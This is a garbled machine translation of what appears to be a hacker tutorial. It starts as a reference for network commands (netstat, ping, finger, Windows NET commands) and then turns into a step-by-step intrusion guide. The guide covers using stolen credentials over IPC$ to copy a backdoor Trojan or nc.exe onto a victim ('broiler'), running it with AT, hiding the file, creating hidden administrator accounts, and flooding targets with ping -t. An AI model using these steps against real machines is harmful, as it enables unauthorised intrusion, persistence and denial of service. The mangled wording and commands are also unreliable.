The function of the NetStat command is to display the network connection, routing tables, and network interface information, allowing users to know what network connects are currently working. The general format of this command is: NetStat [Options] command The meaning of each option is as follows: -a Displays all sockets, including listening. -C is redisplayed every 1 second until the user interrupts it. -I Displays information on all network interfaces, formats with "ifconfig -e". -N replaced the name in the network IP address, the desperation of the desperation of the core routing table, the format is "route -e". -T shows the connection of the TCP protocol. -U Displays the connection of the UDP protocol. -V displays working in progress. The function of the nslookup command is to query the IP address of a machine and its corresponding domain name. It usually requires a domain server to provide domain name services. If the user has already set a domain name server, you can use this command to view the domain name corresponding to the IP address of the different hosts. The general format of this command is: nslookup [ip address / domain name] Finger Command> Finger command function is to query user information, usually display a username, main directory, stagnation time, login time, login time, login time, log in to Shell And other information. If you want to query the user information on the remote machine, you need to pick up the "@ hostname" after the username, use the format of the [User Name @ Host Name], but the network host to query needs to run the finger daemon. The general format of this command is: Finger [Option] [Users] [User @ Host] command The meaning of the options is as follows: -s Displays the user's registration name, actual name, terminal name, write status, stagnation time, login time And other information. -L In addition to the information displayed with the -s option, the user main directory, log in to shell, mail status, etc., and the contents of the.plan, .project, and .forward files under the user's home directory. -P In addition to not displaying the .plan file and .project file, the same is the same as the -l option. The ping command ping command is used to view the host on the network at work, which sends an ICMP Echo_Request package to the host. Sometimes we want to download files from a host on the network, but I don't know if the host is on, just need to use the ping command. The general format of this command is: ping [Option] The meaning of each option in the hostname / IP address command is as follows: -C The number is stopped after sending a specified number of packages. -D Sets the option for SO_DEBUG. -F is a lot of and quickly sending a network package to a machine to see its response. -I second number setting interval to send a network package to a machine, the preset value is sent once a second. The number of times is within the specified number of times, and the packet data is packaged in the fastest way to the specified machine (only the super user can use this option). -Q does not display any information of the package, only the last result is displayed. -R does not directly seal the package into a machine without passing through the gateway, usually see if there is a problem with the network interface of this unit. -S byte number Specifies the number of data bytes sent, and the preset value is 56, plus 8-bytes of ICMP headers, a total of 64icmp data bytes. Net Commands Many Windows NT Network Commands start with NET. These net commands have some public properties: You can check all the available net commands by typing Net /?.
Get the syntax help of the NET command in the command line by typing the NET HELP command. For example, you have to get the help of the NET Aco Unts command, type NET Help Accounts. All net commands accept options / yes and / no (abbreviated as / y and / n). / y "Yes" is automatically replied to any interaction prompt generated by the command, / n answers "No". For example, NET STOP Server usually prompts whether to end all services in accordance with the server service, NET STOP Server / Y automatically answers "Yes" and turn off the server service. NET Accounts Update User Account Database, Change Password and All Account Login Requirements. You must run the network login service on a computer that changes the account parameter. Net Accounts [/ forcelogoff: {minutes | no}] [/ minpwlen: Length] [/ maxpwage: {days | unlimited}] [/ minpwage: days] [/ uniquepw: Number] [/ domain] net accounts [/ sync] [/ domain] Parameter None Net Accounts without parameters will display the current password setting, login time limit, and domain information. / Forcelogoff: {minutes | no} Set the waiting time before the user and server session is ended when the user account or valid login time expires. The NO option is forced to log out. The default setting of this parameter is NO. After specifying / forcelogoff: minutes, Windows NT will give the user alert before it is forced to exit the network Minutes minutes. If there is an open file, Windows NT will warn the user. If Minutes is less than two minutes, the Windows NT warning users immediately log out from the network. / Minpwlen: Length Set the number of least character to the user account password. The allowable range is 0-14, the default is 6. / Maxpwage: {days | unlimited} Set the maximum number of days that is valid for the user account password. Unlimited does not set up the maximum number of days. The number of days of / maxpwage option must be greater than / minupwage. The allowable range is 1-49,710 days (unlimited). The default is 90 days. / MINPWAGE: DAYS Settings the user must keep the minimum number of days of the original password. 0 value does not set the minimum time. The allowable range is 0-49,710 days, the default is 0 days. / UniquePW: Number requires a user to change the password, and the same password must be repeated after the Number is passed. The allowable range is 0-8. The default is 5. / Domain executes this operation on the main domain controller of the current domain. Otherwise only the operation of the local computer. This parameter is only used in Windows NT Workstation computers in the Windows NT Server domain, and the Windows NT Server computer defaults to perform operations in the primary domain controller. / SYNC When used for the primary domain controller, this command synchronizes all backup domain controllers in the domain; when used for backup domain controllers, the command only synchronizes the backup domain controller with the main domain controller. This command applies only to computers of Windows NT Server domain members. Net Computer Add or delete a computer from the domain database.
This command is only available on a computer running Windows NT Server. Net computer / computername {/ add | / del} Parameters / ComputerName Specifies the computer to be added to the domain or from the domain. / Add will add the specified computer to the domain. / DEL will delete the specified computer from the domain. NET Config Displays the currently running configurable service, or displays and changes the settings of a service. NET config [service [options]] Net config non-parameter NET Config will display a list of configurable services. Service is configured by the Net Config command (Server or Workstation). The specific option for the Options service. Full Syntax, please refer to NET Config Server or Net Config Workstation. NET Config Server is displayed or changed when running service. Net config server [/ autodisconnect: Time] [/ srvcomment: "Text"] [/ hidden: {yes | n o}] Parameter is not typed NET Config Server without parameters, the current configuration of the server service will be displayed. / AutodisConnect: Time Set the maximum time value of the open user session idle. You can specify -1, indicating that it is constantly open. The allowable range is -1-65535 minutes, the default value is 15 minutes. / Srvcomment: "text" Add comments to the server, you can display the comments on the screen via the NET View command. Note Up to 48 characters, text must be taken with quotation marks. / Hidden: {yes | no} Specifies whether the computer name of the server appears in the server list. Note that implies a server does not change the authority of the server. The default is NO. Net Config WorkStation service runs, display or change the settings of the workstation services. Net config workstation [/ charcount: bytes] [/ chartime: msec] [/ charwait: sec] NET Config WorkStation without parameters will display the current configuration of the local computer. / ChargeNT: Bytes Specifies the amount of data collected before sending data to the communication device. If you simultaneously set / chartime: msec parameters, Windows NT is run by first satisfying the condition. The allowable range is 0-65535 bytes, and the default value is 16 bytes. / Chartime: MSEC Specifies the time when Windows NT collects data before sending data to the communication device. If you simultaneously set / charcount: Bytes parameters, Windows NT is run by first satisfying the condition. The allowable range is 0-65535000 milliseconds, and the default value is 250 milliseconds. / Charwait: Sec to set the time for Windows NT waiting for the communication device to become available. The allowed range is 0-65535 seconds, and the default is 3,600 seconds.
Net Continue Reactivate the suspended service. net continue service service parameter service can continue to operate, including: file server for macintosh (the service is limited to Windows NT Server), ftp publishing service, lpdsvc, net logon, network dde, network dde dsdm, nt lm security support provider, remoteboot (This service is limited to Windows NT Server, Remote Access Server, Schedule, Server, Simple TCP / IP Services and Workstation. Net file displays all open shared file names and lock files on a server. This command can also turn off individual files and cancel the file lock. NET file [id [/ close]] Parameter NET File does not type without parameters NET file to get a list of open files on the server. ID file identification number. / Close Close the open file and release the lock record. Type this command from the server of shared files. NET Group is added to the Windows NT Server domain, display or change global groups. This command is only available in the Windows NT Server domain. Net group [groupname [/ comment: "text"]] [/ domain] net group groupname {/ add [/ us "] | / delete} [/ domain] Net group groupname username [...] {/ Add | / delete} [/ domain] Parameter NET Group without parameters can display the name of the server name and server. Groupname To add, extend, or delete groups. Only a group name is available to view the list of users in the group. / Comment: "Text" Adds a comment for the new group or existing group. Note You can be up to 48 characters, and you will take the comment text using quotation marks. / Domain executes this operation in the main domain controller of the current domain, otherwise the operation is performed on the local computer. This parameter is only used as a Windows NT WorkStation computer as a member of the Windows NT Server domain. The Windows NT Server computer defaults to operate in the primary domain controller. The username [...] list displays one or more users to be added to the group or from the group. Use spaces to divide multiple user name items. / Add add group or add your username in the group. This command must be used to create an account to the user added to the group. / DELETE delete group or delete the username from the group. NET HELP provides a list of network commands and help topics, or provides the help of the specified command or theme. The network command can be listed in the "Command" window in the "Command Reference" below.
NET HELP [Command] Net command {/ help | /?} NET HELP display with non-parametric NET HELP displays the list of commands and help topics. Command requires its help, do not use Net as part of Command. / Help Provides a display help text. /? Display the correct syntax of the command. Net Helpmsg provides help for Windows NT error messages. Net helpmsg message # parameter message # requires the four-digit code for the Windows NT message that it helps. Net localgroup adds, displays or changes local groups. Net localgroup [Groupname [/ Comment: "Text"] [/ domain] net localgroup groupname {/ add [/ comment: "text"] | / delete} [/ domain] net localgroup groupname name [...] {/ Add | / delete} [/ domain] NET localGroup without parameters will display the server name and the local group name of the computer. GroupName To add, expand or delete local group names. Only GroupName can view global groups in the user list or local group. / Comment: "text" Adds a comment for the new or existing group. Note The maximum length of the text is 48 characters and can be taken with quotation marks. / Domain performs actions in the current domain's primary domain controller, otherwise only performs operations on the local computer. This parameter is applied only to Windows NT Workstation Computers in the Windows NT Server domain. The Windows NT Server computer defaults to operate in the primary domain controller. Name [...] lists a space between one or more usernames or group names to be added to the local group or from the local group, multiple usernames, or group names. Can be local users, other domain users, or global groups, but cannot be other local groups. If it is a user in other domains, add a domain name (for example, SalesRalphr) before the username. / Add Add a global group name or username to a local group. Before using this command to add a user or global group to a local group, you must create an account. / DELETE removes a group name or username from the local group. Net name adds or deletes a message name (sometimes also known as alias), or displays a list of names for the computer receives messages. To use the net name command, the merry service must be run in the computer. Net name [name [/ add | / delete]] Net nameless NET Name without parameters will list the name of the currently used. Name Specifies the name of the received message. The name is up to 15 characters. / Add will add name to your computer. / add is an option, type NET Name Name, and type NET Name Name / Add. / Delete removes the name from your computer.
Net Pause pauses that is running. net pause service parameters of service refers to the following services: file server for macintosh (only Windows NT Server), ftp publishing service, lpdsvc, net logon, network dde, network dde dsdm, nt lm security support provider, remoteboot (only Windows NT Server , Remote Access Server, Schedule, Server, Simple TCP / IP Services, or Workstation. Net Print displays or controls print jobs and print queues. Net Print / ComputerName Sharaname Net Print [/ computername] Job # [/ hold | / release | / delete] Parametric Computername Shared the computer name of the printer queue. ShareName print queue name. When including ComputerName and ShareName, use a backslash () separate them. Job # Assign the identification number of the print job in the printer queue. A computer with one or more printer queues assigns a unique identification number for each print job. If a job number is used to share the printer queue, you cannot assign other jobs, nor can you assign a job in other printer queues. / Hold When using Job #, wait in the printer queue to wait. The print job stays in the printer queue, and other print jobs can only be entered after the job is released. / Release releases the reserved print job. / DELETE removes the print job from the printer queue. NET Send sends a message to other users of the network, computer, or communication name. To receive messages must run the messenger service. NET sent {name | * | / domain [: name] | / users} Message Parameters Name To receive username, computer name, or communication name of the send message. If the computer name contains empty characters, you should take it with quotation marks (""). * Send messages to all names in the group. / Domain [: name] sends the message to all the names in the computer domain. If Name is specified, the message will be sent to all names in the specified domain or group. / Users send messages to all users connected to the server. Message is sent as a message. Net session lists or disconnects the local computer and the session of the client connected to it. Net session [/ computername] [/ delete] NET session without parameters can display all sessions of the local computer. / Computername identifies a computer to list or discontinue the session. / DELETE ends all the open files of the computer during the computer and closing the session with / computername. If the / computername parameter will be omitted, all sessions of the local computer will be canceled. NET Share creates, deletes, or displays shared resources.
NET Share ShareName Net Share ShareName = Drive: path [/ users: Number | / unmark] [/ remark: "text"] net share sharename [/ users: number | unlimited] [/ remark: "text"] net share {sharename | drive: path} / delete parameter NET Share without parameters will display information on all shared resources on the local computer. ShareName is the network name of shared resources. Type the net share command with ShareName, only display the shared information. Drive: PATH Specifies the absolute path of the shared directory. / Users: Number settings can access the maximum number of users that share the shared resource. / Unlimited does not limit the number of users who simultaneously access shared resources. / Remark: "text" Adds a comment about the resource, and the text is taken with quotation marks. / DELETE stops sharing resources. NET Start boot service, or displays a list of start-up services. If the service name is two or more words, such as Net Logon or Computer Browser, you must use quotation marks (") .. NET START [Service] Parameter None Type Net Start to display the run service a list of service includes the following services:. alerter, client service for netware, clipbook server, computer browser, dhcp client, directory replicator, eventlog, ftp publishing service, lpdsvc, messenger, net logon, network dde, network dde dsdm, network monitoring agent, nt lm security support provider, ole, remote access connection manager, remote access isnsap service, remote access server, remote procedure call (rpc) locator, remote procedure call (rpc) service, schedule, server, simple tcp / ip services, snmp, . spooler, tcp / ip netbios helper, ups and workstation following services are only available in Windows NT Server: file server for macintosh, gateway service for netware, microsoft dhcp server, print server for macintosh, remoteboot, windows internet name service Net Statistics. Displays statistical records for local workstations or server services.
Net Statistics [Workstation | Server] Parameters None Net Statistics without parameters will list the running services available for their statistics. WorkStation Displays statistics for local workstation services. Server displays statistics for local server services. Net Stop stops Windows NT network services. NET STOP Service Parameters Service include the following services: Alerter, Client Service, CLIPBOOK Server, Computer Browser, Directory Replicator, FTP Publishing Service (FTP), LPDSVC, Messenger, Net Logon, Network DDE (Network DDE), Network DDE DSDM (Network DDE DSDM), Network Monitor Agent (Network Monitoring Agent), NT LM Security Support Provider (NT LM Security Support), OLE (Object Links & Embedded), Remote Access Connection Manager, Remote Access Isnsap Service (Remote Access ISNSAP Service), Remote Access Server (Remote Access server), Remote Procedure Call (RPC) Locator (Remote Process Call Locator), Remote Procedure Call (RPC) Service (Remote Process Call Service), Schedule, Server, SIMPLE TCP / IP Services (simple TCP / IP Services), SNMP, Spooler, TCP / IP NetBIOS Helper (TCP / IP NetBIOS Aid), UPS and Workstation. The following services are available only in Windows NT Server: File Server for Macintosh, Gateway Service for NetWare, Microsoft DHCP Server, Print Server for Macintosh, RemoteBoot, Windows Internet Name Service. Net Time synchronizes the computer's clock to another computer or domain. Another computer or domain will be displayed when the / set parameter is used.
NET TIME [/ computername | / domain [: name]] [/ set] Parameter / computername To check or synchronize server names. / Domain [: name] Specifies the domain to synchronize with its time. / SET makes this computer clock synchronization with the clock specified by the specified computer or domain. NET USE Connects to your computer or disconnects the computer and the shared resource connection, or displays the connection information of your computer. This command also controls a permanent network connection. NET USE [DeviceName | *] [/ computernameshasename [volume]] [password | *]] [/ user: [domainname] username] [[/ delete] | [/ persistent: {yes | no}] NET USE DeviceName [ / Home [Password | *]] [/ delete: {yes | no}] NET USE [/ persistent: {yes | no}] NET USE that does not type without parameters will list the network connection. DeviceName Specifies the name of the resource to be connected or the device name to be disconnected. There are two types of equipment names: Disk drives (D: to Z :) and printers (LPT1: to LPT3). If you type star, not the specified device name will allocate the next available device name. / ComputerNameshareName server and shared resource name. If the computer name contains a blank character, you must use quotation marks ("") to take the double reverse slash and the computer name. The computer name length can be 1-15 characters. Volume Specifies the NetWare volume on the server. To connect to the NetWare server, you must install and run the NetWare Client Services (Windows NT Workstation). Password Access the password for shared resources. * Tip Type password. This password will not be displayed when you type a password in a password prompt line. / User specifies another user that is connected. DomainName Specifies another domain. For example, NET USE D: / Servershare / User: Admin Mariel is connected to the user Mariel, just as a connection from the Admin domain. If the domain is omitted, the current login domain will be used. UserName Specifies the username of the login. / HOME connects the user to its host directory. / DELETE Cancels the specified network connection. If the user specifies the connection as an asterisk, cancel all network connections. / Persistent controls the use of permanent network connection. The default is the setup of the last used. No device is not permanent. YES Save all connections and restores when you log in next time. NO does not save the established connection and secondary connection, and restore an existing connection when logging in. Use the / DELETE switch to cancel the permanent connection. Net user adds or change user accounts or displays user account information.
Net user [username [password | *] [options]] NET user username {password | *} / add [options] [/ domain] net user username [/ delete] [/ domain] parameter is not type without typing without The NET USER of the parameter will view the user account list on your computer. UserName Add, delete, change, or view the user account name. User account names can have 20 characters. Password assigns or change your password for the user account. The password must meet the minimum parameters set in the NET Accounts Command / MINPWLEN option. Up to 14 characters. DIR displays all folders and files under the current disc. Compare usual methods are, you upload a back door or server (here such as named systems.exe) to broiler's C: / Winnt / System32, you want to see There is no upload success. You can use the dir command. The command is as follows: Dir c: /winnt/system32/systems.exe
Show: 2004-05-24 20:06 194, 762 Systems.exe 1 file 194,762 bytes 0 directory 4,658,597,888 available bytes
If you don't have successful upload, it is displayed as follows: The volume in the drive C does not have a label. The serial number of the volume is 6458-3db8 c: / winnt / system32 / directory can't find a file
CD change the current directory to see the following command: c: /> CD WinNT // Enter Winnt folder
C: / Winnt> CD System32 // Enter the System32 folder
C: / Winnt / System32> CD .. // Back to the previous directory
C: / Winnt> CD..
C: /> c: /> d: // Enter the D disk
D: /> E: // Enter the E disk
E: />
DEL and DELTREEDEL: Delete files. Look at the following command: C: /> DEL C: /XX/ww.txt // Delete the WW file in the XX directory of the C drive.
C: /> C: /> DEL C: / XX /*.* // Delete all files in the XX directory of the C drive
Deltree is more destructive, not only can delete all files, but also delete the C: /> Deltree C: / WinNT // delete the winnt / folder under the C: //. This is to be careful.
Attrid displays and changing files or folder properties. The properties of the file or folder are hidden, represented by the letter H. Read-only, use R, archive, use A. System, use S to change a file or folder property, " " Indicates an increase, "-", indicates that there is a property. Usually we all put the back door or the server under C: / WinNT / System32 of uploading the snacks. After entering the cmd of broiler, in order to make the broiler The administrator knows that we can hide you uploaded. For example, the systems.exe command is as follows: c: /> attrid h c: /winnt/system32/systems.exe // This is not found in System32 Systems.exe C: /> attrid -h c: /winnt/system32/systems.exe // Remove Systems.exe hidden property Copy Copy one or more files to other directories, such as you put the C on the bottom is 1.TXT File Copy to the VV folder of the D disk, C: /> Copy C: /1.txt d: /vv/1.exe
For example, you have established IPC $ connection (how to connect it? After you will talk later), and the broiler is open, this is an open D disk. You can put a back door or server of the systems.exe under your C Under the D Online of the broiler, the command is as follows: C: /> Copy C: /systems.exe // Brazi IP / D $
Net USE can use this command to connect to IPC $ with this command after getting the username and password of the broiler.
NET USE / / Barn IP / IPC $ "Password" / user: "User Name"
After the connection is successful, upload the back door or the server, (such as called Systems.exe, under your D).
Copy D: /systems.exe // Braggi IP / C $ / / Here is to open sharing, you can upload. Otherwise, you can't upload success.
Net time // broke the time of the broiler, it is 24-hour system. For example, this is 3:10 pm. Writing 15:10
AT // broiler ip 15:12 Systems.exe // at 15:12 points, run systems.exe
Here, what you uploaded is the rebound Trojan, you can wait for it to connect to you. In fact, there are many accidents, such as the above, you can join the IPC connection. But and must be able to pass NET TIME / / Biji IP, watching broilers. Even if you can see it, sometimes the AT service of broilers is not open. Even if it is opened, but the back door or server does not necessarily have the opportunity to run, may be killed by anti-virus software. So during the invasion Failure is a common thing. This method is not good, it can be another.
Net user is a user or a new user. This is a screenshot on my computer.
C: /> Net User
// Billgates user account
-------------------------------------------------- ------------------- Guest Guest1 Helpassistantsupport_388945a0 YHKJ command successfully completed.
C: />
The above is all my users. Now I have built a new setwell user, the password is 123456, the screenshot is as follows
C: /> NET User Setwell 123456 / add command successfully completed.
C: /> net localgroup administratrs setwell / add // This command is plus setWell to successfully complete the administrator command.
Next, we will re-use, the picture is as follows
C: /> Net User
// Billgates user account
-------------------------------------------------- -------------- Guest Guest1 HelpassistantSetwell Support_388945a0 YHKJ command successfully completed. The built-in user can use the NET user command, we add $ with a user, you can hide it. This time you built a user, the screenshot is as follows:
The C: /> Net User Set $ 123456 / add command successfully completed.
The C: /> Net localGroup administrators set $ / add command is successful.
C: /> Net User
// Billgates user account
-------------------------------------------------- --------------- Guest Guest1 HelpassistantSetwell Support_388945a0 YHKJ command successfully completed.
C: />
Seeing that there is no, we didn't see the user set $, you can use this command, net localgroup administrators, this command is displaying all administrators, the screenshots are as follows:
C: /> NET localGroup Administrators Alkname Administrators Comment Administrator's unrestricted full access to computer / domain
member
-------------------------------------------------- ---- Guest1Set $ setwellyhkj command successfully completed.
C: />
I didn't see it, we saw the SET $ this user.
If you want to delete the user with this command:
C: /> net user setwell / delete
NET START1. Start some services such as: Net Start Telnet // Start Telnet service
2. Check what the current startup. Take a look at what services I started at my computer:
C: /> NET Start has launched the following Windows services:
Automatic UpdatesCom Event SystemCryptographic ServicesDHCP ClientDistributed Link Tracking ClientDns ClientError Reporting ServiceEvent Loghelp and Supportipsec ServicesLogical Disk ManagerMessenger
This is just part of the service.
NET Share View the default sharing. That is to view these shared C $ D $ E $ F $ admin $ IPC $, this is the system default. My all the crosses, I have intercepted it to the broiler.
C: / Documents and Settings / Administrator> Net Shared $ D: / Default Share F $ F: / Default Sharing Admin $ C: / Winnt Remote Manage C $ C: / Default Sharing E $ E: / Default Sharing Command Successfully Completed. C: / documents and settings / administrator>
This broiler IPC $ sharing is turned off.
Net View is also a sharing, but not the default sharing of the above, or come to the screenshot. It is also broiler,
C: / Documents and Settings / Administrator> NET View server name comment
-------------------------------------------------- ----------------------------- // 17 // hmz // zgh command successfully completed.
C: / documents and settings / administrator>
Learning DOS commands seems to be a little annoying. It is actually very easy to learn. And learn, in the invasion, it will play a lightweight role. Next time NetStat and other orders.
NetStat -an uses this command to see all the connections to this machine. Look at the screenshots on my computer,
D: /> netstat -an
Active Connections
Proto Local Address Foreign Address State TCP 0.0.0.0:0:135 0.0.0.0.0:1025 0.0.0.0:0:1029 0.0.0.0.0:1029 0.0.0.0.0:0.0.0:0.0.0:5000 0.0. 0.0: 0 listening TCP 180.254.158.42:139 0.0.0.0:0.0.0.0.231:80 Established udp 0.0.0.0:500 *: * udp 0.0.0.0:1035 *: * UDP 0.0.0.0 : 1037 *: * UDP 0.0.0.0:1134 *: * udp 0.0.0.0:1136 *: *
Proto Local Address Foreign Address State Protocol Local Port and IP Address Remote Port and IP Address Status
Listening listening status means waiting for the other party
Establishs are being connected.
TCP protocol is TCP
UDP protocol is UDP
TCP 218.95.49.187:2935 218.89.0.231:80 ESTABLISHED This indicates that the TCP protocol native IP (218.95.49.187 via port: 2935 and remote IP (218.89.0.231) port: 80 connection
Query This command is only open 3389 port (not necessarily a port is 3389, saying that it can be changed to other ports. Strictly speaking is a machine that opens a remote terminal service) can be used. I use 1 $ username I got a 3389 machine and saw the screenshot:
C: /> query userusername sessionname ID StateAdministrator Console 0 runs 1 $ RDP-TCP # 2 1 Run
Seeing the above, the administrator is also, if you want to quit, use the following command:
Logoff ID This is logoff 1.
First, ping
It is used to check if the network is smooth or a network connection speed. As a living administrator or hacker living online, the ping command is the first DOS command that must be mastered. The principle it uses is that the machine has a unique IP address on the network, we give the target The IP address sends a packet, and the other party returns a different size packet. According to the returned packet we can determine the existence of the target host, you can initially determine the operating system of the target host, etc. Let's take a look at some of its commonly used operations. Let's take a look at the help, type in the DOS window: ping /? Enter, appear as shown in Figure 1. The help screen shown. Here, we only master some basic useful parameters (below).
-t indicates that the packet is sent between the uninterrupted target IP until we force it to stop. Imagine if you use 100M broadband access, and the target IP is 56K kitten, then how long, the target ip is turned off because of the data that can not bear so much data, huh, an attack is so simple to achieve.
-l Define the size of the sending packet, the default is 32 bytes, and we use it to maximize to 65500 bytes. It will have a better effect in combination with the -t parameter introduced above.
-n defines the number of times the data packet to the target IP, the default is 3 times. If the network speed is slower, it is also a lot of time for us for 3 times, because now our purpose is just to determine if the target IP exists, then it is defined as once.
Description, if the -t parameter is used together, the ping command is based on the back parameters, such as "ping ip -t -n 3", although the -t parameter is used, but not always ping. But only ping 3 times. In addition, the PING command is not necessarily ping IP, or the host domain name can be directly ping, so that the IP of the host can be obtained.
Below we will give an example to illustrate the specific usage, as shown in Figure 2.
Here, Time = 2 indicates that the time used from the issuance of packets to the return packet is 2 seconds, and can determine the size of the network connection speed from here. The return value from the TTL can initially determine the operating system of the PING host, which says "initial judgment" is because this value can be modified. Here TTL = 32 indicates that the operating system may be Win98. (Small knowledge: If TTL = 128, the target host may be Win2000; if tlt = 250, the target host may be UNIX) As for the use of the ping command to quickly find the local area network failure, quickly search the fastest QQ server, can be Others conduct ping attacks ... These depends on everyone. Second, NBTSTAT
This command uses the NetBIOS display protocol statistics and current TCP / IP connections on TCP / IP. Use this command you can get the NetBIOS information of the remote host, such as user name, the workgroup, NIC's MAC address, etc. Here we need to know a few basic parameters.
-a uses this parameter, as long as you know the machine name of the remote host, you can get its NetBIOS information as shown in Figure 3.
-A This parameter can also get the NetBIOS information of the remote host, but you need to know its IP. -n lists NetBIOS information of the local machine.
When the other party's IP or machine name is obtained, the nbtstat command can be used to further get the other party's information, which has added the insurance factor we invaded.
Third, NetStat This is a command to view the network status, and the operation is simple and powerful.
-A View all open ports of the local machine, which can effectively discover and prevent Trojans, you can know information such as services that machines driven, as shown in Figure 4.
Here you can see that the local machine has an FTP service, Telnet service, email service, web service, etc. Usage: NetStat -a IP. -r Lists the current routing information, telling us of the gateway, subnet mask of the local machine, and other information. Usage: NetStat -R IP.
Fourth, Tracert Tracks Routing Information, use this command to detect all the ways throughout the data from the local machine to the target host, which is very helpful for us to understand the network layout and structure. Figure 5.
Here, the data is transmitted from the local machine to 192.168.0.1 machine, and there is no transfer in the middle, indicating that the two machines are in the same local area network. Usage: Tracert IP.
V. Net
This command is the most important one in the network command. It is necessary to thoroughly understand the usage of each subcommand, because its function is too powerful, which is simply Microsoft to provide us the best intrusion tool. First let's take a look at it all the subcommands, type the NET /? Enter as shown in Figure 6.
Here, we focus on grasping a few intrudes commonly used subcommands.
Net view
Use this command to view the remote host so sharing resources. The command format is NET View // IP. Figure 7.
NET USE uses a shared resource of the remote host as the local origin, and the graphical interface is convenient, huh, huh. The command format is NET USE x: // ip / sharename. One of the above represents a total of 192.168.0.5IP's total names of Magic to a local Z disk. The following representation is established and 192.168.0.7 (NET USE // IP / IPC $ "PASSWORD" / user: "name"), as shown in Figure 8.
After the IPC $ is connected, huh, you can upload the file: Copy nc.exe //192.168.0.7/admin $, indicating that nc.exe in the local directory is passed to the remote host, combine the other DOS to be introduced later The command can be invaded.
Net Start uses it to launch the service on the remote host. When you have a connection to the remote host, if you find what the service doesn't start, and you want to use this service? Use this command to start. Usage: Net Start ServerName, as shown in Figure 9, successfully launched a Telnet service. What should I do after the NET STOP invasion discovers a service of the remote host? The use of this command is OK, usage and NET Start.
NET User Viewings related to accounts, including new accounts, delete accounts, view specific accounts, activation accounts, account disabilities, etc. This is very advantageous for our invasion, and it provides a premise for our cloning account. Type NET User without parameters, you can view all users, including disabled. The following explanation. 1, NET User ABCD 1234 / Add, newly built a user name ABCD, password 1234 account, default is a member of the user. 2, Net User ABCD / DEL, delete users named ABCD. 3, NET user abcd / activ: NO, disabled users named ABCD. 4, Net User ABCD / Active: YES, activates users named ABCD. 5, net user abcd, see the case where the user name is ABCD, as shown in Figure 10.
Net localgroup View all information related to the user group and perform related operations. Type NET localGroup without parameters to list all current user groups. During the invasion process, we generally use it to increase an account to the Administrator group account so that we can control the entire remote host with this account. Usage: Net localGroup Groupname UserName / Add, as shown in Figure 11.
Now let's add the newly built user ABCD to the Administrator group, this time ABCD users are already super administrators, huh, you can use net user abcd to see his status, and Figure 10 can be seen come out. But this is too obvious, the network management can leak the flaws at a time of seeing the user, so this method can only deal with the rookie network management, but we have to know. The current means is to use other tools and means to clone a super administrator who can't see the network management, which is later. Interested friends can refer to the "Wanted Deep Solvement Account" in the 30th issue of "hacking line".
NET TIME This command can view the current time of the remote host. If your goal is just entering the remote host, then this command may not be used. But simple intrusion is successful, is it just to see? We need further penetration. This requires the current time of the remote host to know, because the time and other means (later) can implement a certain command and program timing start, to further invade the foundation for us. Usage: NET TIME // IP. Figure 12.
Sixth, AT
The role of this command is to arrange a specific command and program (knowing NET TIME is important to know the NET TIME.). When we know the current time of the remote host, you can use this command to execute a program and command after a certain time (for example 2 minutes). Usage: At Time Command // Computer. Figure 13.
Indicates that the computer named A-01 opens Telnet service at 6:55, and the NET Start Telnet is the command to turn on the Telnet service.
Seven, FTP
What should you be more familiar with this order? There are a lot of hosts on the Internet, which is anonymous, that is, anyone can go up. Now if you sweep a host of an open FTP service (generally open 21-port machine), what if you still don't use FTP command? The basic FTP command usage is given below. First, type FTP Enter to enter the FTP, and the ftp prompt will be used, you can type "Help" to view the help (any DOS command can be used to view its help), as shown in Figure 14. Everyone may see, so much ordered how to use it? In fact, there are so many, mastering a few basic things.
The first is the login process, which is used to use Open, enter the "Open host IP FTP port" in the FTP prompt, and the general port is 21, which is not written. Then enter the legal user name and password to log in, here is an anonymous FTP as an example, as shown in Figure 15.
The username and password are FTP, and the password is not displayed. When prompted **** logged in, you will explain the successful landing. Here is an anonymous login, the user is displayed as anonymous.
Next, the method of use of the specific command is described, as shown in Figure 16.
DIR is the same as the DOS command, used to view the server's file, tapping the DIR to the route, you can see the files on this FTP server. The CD enters a folder. GET downloads to the local machine. PUT upload file to the remote server. This is to see if the remote FTP server gives you a writable permissions, if you can, huh, how can I use it without saying it, everyone will go free to go. Delete deletes files on the remote FTP server. This must also guarantee that you have writable rights. Bye exits the current connection. Quit is the same.
Eight, Telnet features powerful remote login commands, almost all invaders like to use it, trial is not unhappy. why? It is easy to operate, just like using its own machine, as long as you are familiar with the DOS command, you can use it to do everything you want to do after connecting the remote machine with Administrator. Let's take a look at how to use it, first type Telnet Enter, then type HELP to view its help information, as shown in Figure 17.
Then in the prompt, type Open IP Enter, then there is a login window, let you enter the legal username and password, here you enter any password is not displayed, as shown in Figure 18.
When the input username and password are correct, the Telnet connection is successfully established. At this time, you have the same permissions as this user on the remote host. You can achieve what you want to do with the DOS command, as shown in Figure 19. Here I use super administrator privileges to log in.
Learn DOS for a great help when a good network management, special proficiency masters some network DOS commands. In addition, everyone should clear that anyone wants to enter the system, must have a legal username and password (the input method is almost extinctive), even if you get the account, there is only a small permission, you can also use it. To achieve the last goal. Therefore, resolutely destroy the empty password, add a strong password to his account, is the best way to defend the invasion of the invasion. Finally, sincerely, cultivate good safety awareness is the most important
